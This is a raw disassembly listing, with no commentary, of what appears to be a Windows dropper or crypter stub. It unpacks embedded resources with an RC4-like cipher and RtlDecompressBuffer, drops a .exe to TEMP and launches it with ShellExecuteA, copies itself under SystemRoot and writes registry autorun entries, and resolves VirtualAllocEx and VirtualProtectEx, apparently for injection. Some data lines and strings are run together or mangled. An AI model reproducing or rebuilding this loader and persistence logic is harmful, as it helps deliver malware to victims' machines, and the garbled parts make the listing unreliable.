xor esi, esi
loc_403CA2: ; CODE XREF: sub_403C48+56�j
mov bl, [ecx]
add bl, [esp+1Ch+var_17]
add al, bl
mov bl, [ecx]
mov [esp+1Ch+var_18], bl
xor ebx, ebx
mov bl, al
mov bl, [edi+ebx]
mov [ecx], bl
xor ebx, ebx
mov bl, al
lea ebp, [edi+ebx]
mov bl, [esp+1Ch+var_18]
mov [ebp+0], bl
inc ecx
dec dl
jnz short loc_403C82
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_403C48 endp
; =============== S U B R O U T I N E =======================================
sub_403CD4 proc near ; CODE XREF: sub_403D98+4A�p
xor ecx, ecx
mov edx, 102h
call sub_4018A8
retn
sub_403CD4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403CE4 proc near ; CODE XREF: sub_403D5C+31�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
dec ebx
test ebx, ebx
jl short loc_403D54
inc ebx
mov [ebp+var_4], ebx
mov esi, edx
loc_403CF9: ; CODE XREF: sub_403CE4+6E�j
inc byte ptr [eax+100h]
xor edx, edx
mov dl, [eax+100h]
mov dl, [eax+edx]
add [eax+101h], dl
xor ebx, ebx
mov bl, [eax+101h]
mov bl, [eax+ebx]
push ebx
xor ebx, ebx
mov bl, [eax+100h]
lea edi, [eax+ebx]
pop ebx
mov [edi], bl
xor ebx, ebx
mov bl, [eax+101h]
mov [eax+ebx], dl
xor ebx, ebx
mov bl, [eax+100h]
add dl, [eax+ebx]
and edx, 0FFh
mov dl, [eax+edx]
xor dl, [esi]
mov [ecx], dl
inc ecx
inc esi
dec [ebp+var_4]
jnz short loc_403CF9
loc_403D54: ; CODE XREF: sub_403CE4+D�j
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 4
sub_403CE4 endp
; =============== S U B R O U T I N E =======================================
sub_403D5C proc near ; CODE XREF: sub_403D98+32�p
push ebx
push esi
push edi
push ebp
mov edi, ecx
mov esi, edx
mov ebp, eax
mov eax, esi
call sub_401F04
mov ebx, eax
mov eax, edi
mov edx, ebx
call sub_402184
push ebx
mov eax, edi
call sub_4020AC
push eax
mov eax, esi
call sub_402058
mov edx, eax
mov eax, ebp
pop ecx
call sub_403CE4
pop ebp
pop edi
pop esi
pop ebx
retn
sub_403D5C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D98 proc near ; CODE XREF: CODE:00404162�p
var_102 = byte ptr -102h
push ebp
mov ebp, esp
add esp, 0FFFFFEFCh
push ebx
push esi
mov esi, ecx
mov ebx, eax
lea eax, [ebp+var_102]
call sub_403C48
xor eax, eax
push ebp
push offset loc_403DE8
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ecx, esi
lea eax, [ebp+var_102]
mov edx, ebx
call sub_403D5C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403DEF
loc_403DDC: ; CODE XREF: sub_403D98+55�j
lea eax, [ebp+var_102]
call sub_403CD4
retn
; ---------------------------------------------------------------------------
loc_403DE8: ; DATA XREF: sub_403D98+1D�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403DDC
; ---------------------------------------------------------------------------
loc_403DEF: ; CODE XREF: sub_403D98+4F�j
; DATA XREF: sub_403D98+3F�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403D98 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DF8 proc near ; DATA XREF: CODE:00403FB8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403E1D
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064E0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403E24
loc_403E1C: ; CODE XREF: sub_403DF8+2A�j
retn
; ---------------------------------------------------------------------------
loc_403E1D: ; DATA XREF: sub_403DF8+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403E1C
; ---------------------------------------------------------------------------
loc_403E24: ; CODE XREF: sub_403DF8:loc_403E1C�j
; DATA XREF: sub_403DF8+1F�o
pop ebp
retn
sub_403DF8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403E28 proc near ; DATA XREF: CODE:00403FB4�o
sub ds:dword_4064E0, 1
retn
sub_403E28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403E30 proc near ; CODE XREF: sub_403E44+7F�p
jmp ds:dword_4071A8
sub_403E30 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403E38 proc near ; CODE XREF: sub_403E44+25�p
test eax, eax
jz short locret_403E41
sub eax, 4
mov eax, [eax]
locret_403E41: ; CODE XREF: sub_403E38+2�j
retn
sub_403E38 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E44 proc near ; CODE XREF: CODE:00404119�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403EF1
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+arg_4]
call sub_403E38
mov ebx, eax
cmp ebx, 4
jbe short loc_403ED4
lea eax, [ebp+arg_4]
call sub_4020AC
mov edi, eax
mov edx, [edi]
mov eax, esi
call sub_402184
cmp dword ptr [edi], 80000h
jbe short loc_403E99
mov [ebp+var_8], 2
jmp short loc_403EA0
; ---------------------------------------------------------------------------
loc_403E99: ; CODE XREF: sub_403E44+4A�j
mov [ebp+var_8], 102h
loc_403EA0: ; CODE XREF: sub_403E44+53�j
lea eax, [ebp+var_4]
push eax
sub ebx, 4
push ebx
lea eax, [ebp+arg_4]
call sub_4020AC
add eax, 4
push eax
mov eax, [edi]
push eax
mov eax, esi
call sub_4020AC
push eax
mov eax, [ebp+var_8]
push eax
call sub_403E30 ; RtlDecompressBuffer
mov eax, esi
mov edx, [ebp+var_4]
call sub_402184
jmp short loc_403EDB
; ---------------------------------------------------------------------------
loc_403ED4: ; CODE XREF: sub_403E44+2F�j
mov eax, esi
call sub_401DC4
loc_403EDB: ; CODE XREF: sub_403E44+8E�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403EF8
loc_403EE8: ; CODE XREF: sub_403E44+B2�j
lea eax, [ebp+arg_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403EF1: ; DATA XREF: sub_403E44+17�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403EE8
; ---------------------------------------------------------------------------
loc_403EF8: ; CODE XREF: sub_403E44+AC�j
; DATA XREF: sub_403E44+9F�o
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn 8
sub_403E44 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F04 proc near ; DATA XREF: CODE:00403FC0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403F29
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064E4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403F30
loc_403F28: ; CODE XREF: sub_403F04+2A�j
retn
; ---------------------------------------------------------------------------
loc_403F29: ; DATA XREF: sub_403F04+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403F28
; ---------------------------------------------------------------------------
loc_403F30: ; CODE XREF: sub_403F04:loc_403F28�j
; DATA XREF: sub_403F04+1F�o
pop ebp
retn
sub_403F04 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403F34 proc near ; DATA XREF: CODE:00403FBC�o
sub ds:dword_4064E4, 1
retn
sub_403F34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F3C proc near ; DATA XREF: CODE:00403FC8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403F5B
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403F62
loc_403F5A: ; CODE XREF: sub_403F3C+24�j
retn
; ---------------------------------------------------------------------------
loc_403F5B: ; DATA XREF: sub_403F3C+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403F5A
; ---------------------------------------------------------------------------
loc_403F62: ; CODE XREF: sub_403F3C:loc_403F5A�j
; DATA XREF: sub_403F3C+19�o
pop ebp
retn
sub_403F3C endp
; ---------------------------------------------------------------------------
dword_403F64 dd 0Ch ; BSS:off_4063CC�o
dd offset off_403F6C
off_403F6C dd offset loc_402A5C ; DATA XREF: CODE:00403F68�o
dd offset sub_402A2C
dd offset sub_402914
dd offset sub_4028CC
dd offset sub_402A94
dd offset sub_402A64
dd offset sub_402BBC
dd offset sub_402B8C
dd offset sub_402C04
dd offset sub_402BD4
dd offset sub_403478
dd offset sub_403448
dd offset sub_40362C
dd offset sub_4035FC
dd offset sub_4038F8
dd offset sub_4038C8
dd offset sub_403C40
dd offset sub_403C10
dd offset sub_403E28
dd offset sub_403DF8
dd offset sub_403F34
dd offset sub_403F04
align 8
dd offset sub_403F3C
; ---------------------------------------------------------------------------
public start
start:
push ebp
mov ebp, esp
mov ecx, 0Eh
loc_403FD4: ; CODE XREF: CODE:00403FD9�j
push 0
push 0
dec ecx
jnz short loc_403FD4
push ebx
push esi
push edi
mov eax, offset dword_403F64
call sub_4029E8
xor eax, eax
push ebp
push offset loc_404813
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, offset dword_404824
mov eax, offset dword_406E1C
call sub_403368
mov ebx, eax
test ebx, ebx
jnz short loc_404012
push 0
call near ptr 429400h
loc_404012: ; CODE XREF: CODE:00404009�j
mov edx, offset aNbqbec ; "NBQBEC"
mov eax, ebx
mov ecx, ds:dword_406E1C
call sub_401264
mov ds:dword_406E20, 0Ah
mov ebx, offset dword_406DCC
mov esi, offset dword_406DF4
mov edi, offset aNbqbec ; "NBQBEC"
loc_40403D: ; CODE XREF: CODE:00404572�j
mov eax, offset dword_406E24
mov edx, 4
call sub_402B84
cmp dword ptr [ebx], 0
jz short loc_404055
xor eax, eax
mov [ebx], eax
loc_404055: ; CODE XREF: CODE:0040404F�j
mov edx, edi
mov eax, esi
call sub_403368
mov [ebx], eax
cmp dword ptr [ebx], 0
jz loc_404560
mov eax, offset dword_406E24
mov edx, [esi]
call sub_402184
mov eax, offset dword_406E24
call sub_4020AC
mov edx, eax
mov eax, [ebx]
mov ecx, [esi]
call sub_401264
mov eax, edi
mov ds:off_406F84, eax
lea edx, [ebp-14h]
xor eax, eax
call sub_4013B0
mov eax, [ebp-14h]
mov ecx, offset dword_406F80
mov edx, offset dword_406F7C
call sub_402E38
cmp al, 1
jnz short loc_4040DC
mov eax, ds:dword_406F80
xor edx, edx
push edx
push eax
mov eax, ds:off_406F84
mov edx, [eax+0BCh]
mov eax, [eax+0B8h]
cmp edx, [esp+4]
jnz short loc_4040D4
cmp eax, [esp]
loc_4040D4: ; CODE XREF: CODE:004040CF�j
pop edx
pop eax
jnz loc_404560
loc_4040DC: ; CODE XREF: CODE:004040AF�j
mov eax, ds:off_406F84
cmp byte ptr [eax+0A2h], 0
jz short loc_404104
lea edx, [ebp-18h]
mov eax, ds:dword_406E24
call sub_403168
mov edx, [ebp-18h]
mov eax, offset dword_406E24
call sub_401E18
loc_404104: ; CODE XREF: CODE:004040E8�j
mov eax, ds:off_406F84
cmp byte ptr [eax+6Ah], 0
jz short loc_40412B
mov eax, ds:dword_406E24
push eax
lea eax, [ebp-1Ch]
push eax
call sub_403E44
mov edx, [ebp-1Ch]
mov eax, offset dword_406E24
call sub_401E18
loc_40412B: ; CODE XREF: CODE:0040410D�j
mov eax, ds:off_406F84
cmp byte ptr [eax+48h], 0
jz short loc_4041B4
mov eax, ds:off_406F84
cmp byte ptr [eax+49h], 0
jz short loc_404176
lea eax, [ebp-24h]
mov edx, ds:off_406F84
add edx, 60h
mov ecx, 0Ah
call sub_401EEC
mov edx, [ebp-24h]
lea ecx, [ebp-20h]
mov eax, ds:dword_406E24
call sub_403D98
mov edx, [ebp-20h]
mov eax, offset dword_406E24
call sub_401E18
jmp short loc_4041B4
; ---------------------------------------------------------------------------
loc_404176: ; CODE XREF: CODE:0040413F�j
mov eax, ds:off_406F84
push dword ptr [eax+5Ch]
push dword ptr [eax+58h]
mov eax, ds:off_406F84
push dword ptr [eax+54h]
push dword ptr [eax+50h]
lea eax, [ebp-28h]
mov edx, ds:off_406F84
add edx, 60h
mov ecx, 0Ah
call sub_401EEC
mov edx, [ebp-28h]
mov ecx, offset dword_406E24
mov eax, ds:dword_406E24
call sub_403B84
loc_4041B4: ; CODE XREF: CODE:00404134�j
; CODE:00404174�j
mov eax, ds:off_406F84
cmp byte ptr [eax+0B0h], 0
jz loc_404377
lea edx, [ebp-2Ch]
xor eax, eax
call sub_4013B0
mov eax, [ebp-2Ch]
mov ecx, offset dword_406F80
mov edx, offset dword_406F7C
call sub_402E38
test al, al
jnz loc_404348
call sub_401410
lea edx, [ebp-30h]
mov eax, offset dword_404830
call sub_4033B0
push dword ptr [ebp-30h]
push offset dword_40483C
mov eax, 0Ah
call sub_4018C8
lea edx, [ebp-34h]
call sub_4030FC
push dword ptr [ebp-34h]
mov eax, 0Ah
call sub_4018C8
lea edx, [ebp-38h]
call sub_4030FC
push dword ptr [ebp-38h]
mov eax, 0Ah
call sub_4018C8
lea edx, [ebp-3Ch]
call sub_4030FC
push dword ptr [ebp-3Ch]
push offset dword_404848
mov eax, offset dword_406F74
mov edx, 6
call sub_401FC4
push offset dword_406E24
mov eax, ds:dword_406E24
call sub_401F04
cdq
push edx
push eax
mov eax, ds:off_406F84
mov edx, [eax+0BCh]
mov eax, [eax+0B8h]
sub [esp], eax
sbb [esp+4], edx
pop eax
pop edx
add eax, 1
adc edx, 0
push eax
mov eax, ds:off_406F84
mov eax, [eax+0B8h]
mov ecx, eax
mov eax, ds:dword_406E24
pop edx
call sub_4020B4
lea edx, [ebp-44h]
xor eax, eax
call sub_4013B0
mov eax, [ebp-44h]
lea edx, [ebp-40h]
call sub_402CDC
mov edx, [ebp-40h]
mov eax, offset dword_406E24
mov ecx, ds:dword_406E24
call sub_401F50
mov edx, ds:dword_406F74
mov eax, offset dword_406E28
call sub_4016A4
mov edx, 1
mov eax, offset dword_406E28
call sub_401A08
call sub_401228
push 0
mov eax, ds:dword_406E24
call sub_401F04
push eax
mov eax, offset dword_406E24
call sub_4020AC
mov edx, eax
mov eax, offset dword_406E28
pop ecx
call sub_4017C8
call sub_401228
mov eax, offset dword_406E28
call sub_4017E8
call sub_401228
push 0
push 0
push 0
mov eax, ds:dword_406F74
call sub_402058
push eax
push offset aOpen ; "open"
push 0
call sub_402BCC ; ShellExecuteA
jmp loc_404560
; ---------------------------------------------------------------------------
loc_404348: ; CODE XREF: CODE:004041E4�j
mov eax, ds:dword_406E24
call sub_401F04
cdq
push edx
push eax
mov eax, ds:dword_406F80
xor edx, edx
sub [esp], eax
sbb [esp+4], edx
pop eax
pop edx
mov edx, eax
mov eax, offset dword_406E24
mov ecx, ds:dword_406F80
call sub_4020F4
loc_404377: ; CODE XREF: CODE:004041C0�j
mov eax, ds:off_406F84
cmp byte ptr [eax+6Bh], 0
jz short loc_4043BC
loc_404382: ; CODE XREF: CODE:004043BA�j
push 0
lea edx, [ebp-48h]
xor eax, eax
call sub_4013B0
mov eax, [ebp-48h]
push eax
mov eax, offset dword_406E24
call sub_4020AC
xor ecx, ecx
pop edx
call sub_403640
mov ds:byte_406F78, al
push 0FA0h
call sub_402B6C ; Sleep
cmp ds:byte_406F78, 1
jnz short loc_404382
loc_4043BC: ; CODE XREF: CODE:00404380�j
mov eax, ds:off_406F84
cmp byte ptr [eax+6Ch], 0
jz short loc_4043FF
loc_4043C7: ; CODE XREF: CODE:004043FD�j
push 0
mov eax, offset dword_406E24
call sub_4020AC
push eax
lea eax, [ebp-4Ch]
call sub_403038
mov edx, [ebp-4Ch]
xor ecx, ecx
pop eax
call sub_403640
mov ds:byte_406F78, al
push 0FA0h
call sub_402B6C ; Sleep
cmp ds:byte_406F78, 1
jnz short loc_4043C7
loc_4043FF: ; CODE XREF: CODE:004043C5�j
mov eax, ds:off_406F84
cmp byte ptr [eax+6Dh], 0
jz loc_404560
lea eax, [ebp-54h]
mov edx, ds:off_406F84
add edx, 6Eh
mov ecx, 32h
call sub_401EEC
mov eax, [ebp-54h]
lea edx, [ebp-50h]
call sub_4033B0
mov edx, [ebp-50h]
mov eax, offset dword_406F74
call sub_401E18
cmp ds:dword_406F74, 0
jnz short loc_40449B
lea eax, [ebp-58h]
mov edx, ds:off_406F84
add edx, 6Eh
mov ecx, 32h
call sub_401EEC
mov eax, [ebp-58h]
call sub_402CB8
test al, al
jz short loc_404481
mov eax, offset dword_406F74
mov edx, ds:off_406F84
add edx, 6Eh
mov ecx, 32h
call sub_401EEC
jmp short loc_40449B
; ---------------------------------------------------------------------------
loc_404481: ; CODE XREF: CODE:00404465�j
lea edx, [ebp-5Ch]
mov eax, offset dword_404830
call sub_4033B0
mov edx, [ebp-5Ch]
mov eax, offset dword_406F74
call sub_401E18
loc_40449B: ; CODE XREF: CODE:00404443�j
; CODE:0040447F�j
push ds:dword_406F74
push offset dword_40483C
lea eax, [ebp-60h]
mov edx, ds:off_406F84
add edx, 0Ah
mov ecx, 32h
call sub_401EEC
push dword ptr [ebp-60h]
mov eax, offset dword_406F74
mov edx, 3
call sub_401FC4
mov edx, ds:dword_406F74
mov eax, offset dword_406E28
call sub_4016A4
mov edx, 1
mov eax, offset dword_406E28
call sub_401A08
call sub_401228
push 0
mov eax, ds:dword_406E24
call sub_401F04
push eax
mov eax, offset dword_406E24
call sub_4020AC
mov edx, eax
mov eax, offset dword_406E28
pop ecx
call sub_4017C8
call sub_401228
mov eax, offset dword_406E28
call sub_4017E8
call sub_401228
mov eax, ds:off_406F84
cmp byte ptr [eax+0A0h], 0
jz short loc_404560
mov eax, ds:off_406F84
movzx eax, byte ptr [eax+0A1h]
push eax
push 0
push 0
mov eax, ds:dword_406F74
call sub_402058
push eax
push offset aOpen ; "open"
push 0
call sub_402BCC ; ShellExecuteA
loc_404560: ; CODE XREF: CODE:00404063�j
; CODE:004040D6�j ...
add edi, 0C0h
add esi, 4
add ebx, 4
dec ds:dword_406E20
jnz loc_40403D
mov edx, offset aAus ; "AUS"
mov eax, offset dword_4064F8
call sub_403368
mov ebx, eax
test ebx, ebx
jz loc_4047F8 ; default
; jumptable 00404745 case 0
cmp ds:dword_4064F8, 0
jle loc_4047F8 ; default
; jumptable 00404745 case 0
lea edx, [ebp-64h]
xor eax, eax
call sub_4013B0
mov eax, [ebp-64h]
mov ecx, offset dword_406F80
mov edx, offset dword_406F7C
call sub_402E38
test al, al
jnz loc_4047F8 ; default
; jumptable 00404745 case 0
mov edx, offset dword_4064FC
mov eax, ebx
mov ecx, ds:dword_4064F8
call sub_401264
mov eax, offset dword_4064E8
mov edx, offset dword_406504
mov ecx, 81h
call sub_401EEC
mov eax, offset dword_4064EC
mov edx, offset byte_406585
mov ecx, 41h
call sub_401EEC
mov eax, offset dword_4064F0
mov edx, offset word_4065C6
mov ecx, 41h
call sub_401EEC
mov eax, offset dword_4064F4
mov edx, offset byte_406607
mov ecx, 41h
call sub_401EEC
push 0
push 14h
push 0
push 32h
mov ecx, offset dword_4064E8
mov edx, offset dword_404864
mov eax, ds:dword_4064E8
call sub_403B84
push 0
push 14h
push 0
push 32h
mov ecx, offset dword_4064EC
mov edx, offset dword_404864
mov eax, ds:dword_4064EC
call sub_403B84
push 0
push 14h
push 0
push 32h
mov ecx, offset dword_4064F0
mov edx, offset dword_404864
mov eax, ds:dword_4064F0
call sub_403B84
push 0
push 14h
push 0
push 32h
mov ecx, offset dword_4064F4
mov edx, offset dword_404864
mov eax, ds:dword_4064F4
call sub_403B84
lea edx, [ebp-68h]
mov eax, ds:dword_4064F0
call sub_4033B0
mov edx, [ebp-68h]
mov eax, offset dword_406F74
call sub_401E18
cmp ds:dword_406F74, 0
jnz short loc_4046F1
mov eax, ds:dword_4064F0
call sub_402CB8
test al, al
jz short loc_4046D7
mov eax, offset dword_406F74
mov edx, ds:dword_4064F0
call sub_401E18
jmp short loc_4046F1
; ---------------------------------------------------------------------------
loc_4046D7: ; CODE XREF: CODE:004046C3�j
lea edx, [ebp-6Ch]
mov eax, offset aSystemroot ; "SystemRoot"
call sub_4033B0
mov edx, [ebp-6Ch]
mov eax, offset dword_406F74
call sub_401E18
loc_4046F1: ; CODE XREF: CODE:004046B5�j
; CODE:004046D5�j
push ds:dword_406F74
push offset dword_40483C
push ds:dword_4064F4
mov eax, offset dword_406F74
mov edx, 3
call sub_401FC4
push 0
mov eax, ds:dword_406F74
call sub_402058
push eax
lea edx, [ebp-70h]
xor eax, eax
call sub_4013B0
mov eax, [ebp-70h]
call sub_402058
push eax
call sub_402ABC ; CopyFileA
mov eax, ds:dword_4064FC
cmp eax, 5 ; switch 6 cases
ja loc_4047F8 ; default
; jumptable 00404745 case 0
jmp off_40474C[eax*4] ; switch jump
; ---------------------------------------------------------------------------
off_40474C dd offset loc_4047F8 ; DATA XREF: CODE:00404745�r
dd offset loc_404764 ; jump table for switch statement
dd offset loc_404782
dd offset loc_4047A0
dd offset loc_4047BE
dd offset loc_4047DC
; ---------------------------------------------------------------------------
loc_404764: ; CODE XREF: CODE:00404745�j
; DATA XREF: CODE:off_40474C�o
mov eax, ds:dword_406F74 ; jumptable 00404745 case 1
push eax
mov ecx, ds:dword_4064EC
mov edx, ds:dword_4064E8
mov eax, 80000000h
call sub_402C0C
jmp short loc_4047F8 ; default
; jumptable 00404745 case 0
; ---------------------------------------------------------------------------
loc_404782: ; CODE XREF: CODE:00404745�j
; DATA XREF: CODE:off_40474C�o
mov eax, ds:dword_406F74 ; jumptable 00404745 case 2
push eax
mov ecx, ds:dword_4064EC
mov edx, ds:dword_4064E8
mov eax, 80000001h
call sub_402C0C
jmp short loc_4047F8 ; default
; jumptable 00404745 case 0
; ---------------------------------------------------------------------------
loc_4047A0: ; CODE XREF: CODE:00404745�j
; DATA XREF: CODE:off_40474C�o
mov eax, ds:dword_406F74 ; jumptable 00404745 case 3
push eax
mov ecx, ds:dword_4064EC
mov edx, ds:dword_4064E8
mov eax, 80000002h
call sub_402C0C
jmp short loc_4047F8 ; default
; jumptable 00404745 case 0
; ---------------------------------------------------------------------------
loc_4047BE: ; CODE XREF: CODE:00404745�j
; DATA XREF: CODE:off_40474C�o
mov eax, ds:dword_406F74 ; jumptable 00404745 case 4
push eax
mov ecx, ds:dword_4064EC
mov edx, ds:dword_4064E8
mov eax, 80000003h
call sub_402C0C
jmp short loc_4047F8 ; default
; jumptable 00404745 case 0
; ---------------------------------------------------------------------------
loc_4047DC: ; CODE XREF: CODE:00404745�j
; DATA XREF: CODE:off_40474C�o
mov eax, ds:dword_406F74 ; jumptable 00404745 case 5
push eax
mov ecx, ds:dword_4064EC
mov edx, ds:dword_4064E8
mov eax, 80000005h
call sub_402C0C
loc_4047F8: ; CODE XREF: CODE:0040458B�j
; CODE:00404598�j ...
xor eax, eax ; default
; jumptable 00404745 case 0
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40481A
loc_404805: ; CODE XREF: CODE:00404818�j
lea eax, [ebp-70h]
mov edx, 18h
call sub_401DE8
retn
; ---------------------------------------------------------------------------
loc_404813: ; DATA XREF: CODE:00403FEB�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_404805
; ---------------------------------------------------------------------------
loc_40481A: ; CODE XREF: CODE:00404812�j
; DATA XREF: CODE:00404800�o
pop edi
pop esi
pop ebx
call sub_401CDC
; ---------------------------------------------------------------------------
align 4
dword_404824 dd 544553h, 0FFFFFFFFh, 3dword_404830 dd 504D54h, 0FFFFFFFFh, 1 ; CODE:00404484�o
dword_40483C dd 5Ch, 0FFFFFFFFh, 4 ; CODE:004044A1�o ...
dword_404848 dd 6578652Eh, 0 aOpen db 'open',0 ; DATA XREF: CODE:00404337�o
; CODE:00404554�o
align 4
aAus db 'AUS',0 ; DATA XREF: CODE:00404578�o
dd 0FFFFFFFFh, 3
dword_404864 dd 747561h, 0FFFFFFFFh, 0Ah ; CODE:0040464D�o ...
aSystemroot db 'SystemRoot',0 ; DATA XREF: CODE:004046DA�o
db 0
CODE ends
; Section 2. (virtual address 00005000)
; Virtual size : 000000C8 ( 200.)
; Section size in file : 000000C8 ( 200.)
; Offset to raw data for section: 00005000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
DATA segment para public 'DATA' use32
assume cs:DATA
;org 405000h
dword_405000 dd 0 ; sub_401CDC+9�o ...
dword_405004 dd 0 ; sub_401CDC:loc_401D0B�r ...
dword_405008 dd 0 ; sub_4018C8+3�r ...
byte_40500C db 2 ; DATA XREF: sub_40190C+4E�r
; sub_4019EC�r ...
db 8Dh, 40h, 0
byte_405010 db 0 ; DATA XREF: sub_401B6C�r
db 8Dh, 40h, 0
byte_405014 db 1 ; DATA XREF: sub_4016A4+25�r
db 8Dh, 40h, 0
off_405018 dd offset dword_40508C ; DATA XREF: sub_402858�r sub_402858+8�w
dword_40501C dd 0 off_405020 dd offset sub_402868 ; DATA XREF: sub_401CDC+66�r
off_405024 dd offset nullsub_1 ; DATA XREF: sub_402260+67�r
off_405028 dd offset nullsub_1 ; DATA XREF: sub_402260+71�r
off_40502C dd offset sub_401C00 ; DATA XREF: sub_401C00+F�r
; sub_401C00+35�r ...
off_405030 dd offset sub_401BCC ; DATA XREF: sub_401CDC:loc_401D2A�r
off_405034 dd offset nullsub_1 ; DATA XREF: sub_401CDC:loc_401D5D�r
off_405038 dd offset nullsub_1 ; DATA XREF: sub_4028CC:loc_4028F4�r
dword_40503C dd 0 ; sub_401108+4�r ...
off_405040 dd offset sub_4010F4 ; DATA XREF: sub_401144+4�r
; sub_401174+3F�r
off_405044 dd offset sub_401108 ; DATA XREF: sub_40115C+4�r
; sub_401174+26�r
off_405048 dd offset sub_40112C ; DATA XREF: sub_401174+D�r
byte_40504C db 0 ; DATA XREF: sub_4011D0+36�r
aRsu db 'ΛΜΘΙΧΟΘΝΞΫΨΚΩΪάέήίΰαγ',0
aFxn@ db 'δε@',0
dword_405068 dd 3 align 10h
dd 1, 2, 3, 3 dup(0)
off_405088 dd offset nullsub_1 ; DATA XREF: sub_401CDC+38�r
dword_40508C dd 0 ; sub_4029E8+33�o ...
dword_405090 dd 400000h dword_405094 dd 0 dword_405098 dd 0 dd 2 dup(0)
dword_4050A4 dd 1 dd 10h, 2, 20h, 4, 40h, 4, 40h
off_4050C4 dd offset byte_40500C ; DATA XREF: sub_402CDC+33�r
DATA ends
; Section 3. (virtual address 00006000)
; Virtual size : 00000F89 ( 3977.)
; Section size in file : 00000F89 ( 3977.)
; Offset to raw data for section: 00006000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
BSS segment para public '' use32
assume cs:BSS
;org 406000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
off_406000 dd offset sub_4025B8 ; DATA XREF: sub_402914+13�w
dword_406004 dd 0 ; sub_4011D0+16�r
off_406008 dd offset sub_401094 ; DATA XREF: sub_401B6C+1C�r
; sub_401C70�w
off_40600C dd offset loc_4010A4 ; DATA XREF: sub_401C70+A�w
dword_406010 dd 0 ; sub_401CDC+A9�r
dword_406014 dd 400000h dword_406018 dd 6CCh byte_40601C db 0 ; DATA XREF: sub_401C70+2E�w
align 10h
dword_406020 dd 0 dword_406024 dd 73h dup(0) dword_4061F0 dd 73h dup(0) dword_4063BC dd 0 ; sub_402914�w
dword_4063C0 dd 140000h ; sub_401108+D�r ...
dword_4063C4 dd 2 dup(0) ; sub_401CAC+D�o ...
off_4063CC dd offset dword_403F64 ; DATA XREF: sub_401C54�r
; sub_401C70+14�w
dword_4063D0 dd 0 ; sub_401C70+1B�w
off_4063D4 dd offset dword_40508C ; DATA XREF: sub_401C70+20�w
dd 6 dup(0)
dword_4063F0 dd 0 ; sub_4028CC+22�r
off_4063F4 dd offset sub_402568 ; DATA XREF: sub_402580�o
; sub_402580+19�w ...
off_4063F8 dd offset sub_402560 ; DATA XREF: sub_4025A8�r
dd 29h dup(offset sub_402560)
byte_4064A0 db 0 ; DATA XREF: sub_40299C�r
align 4
TlsIndex dd 0 ; DATA XREF: sub_402958+C�r
; sub_402958+37�r ...
dd 0
dword_4064AC dd 400000h ; sub_4029E8+16�r ...
dword_4064B0 dd 0 ; CODE:loc_402A5C�w
dword_4064B4 dd 0 dword_4064B8 dd 0 ; sub_402A94�w
dword_4064BC dd 0 ; sub_402BBC�w
dword_4064C0 dd 0 ; sub_402C04�w
dword_4064C4 dd 0 ; sub_403478�w
dword_4064C8 dd 0 ; sub_40362C�w
dword_4064CC dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocEx ; sub_40348C+24�w ...
dword_4064D0 dd 7C801A5Dh ; resolved to->KERNEL32.VirtualProtectEx ; sub_40350C+24�w ...
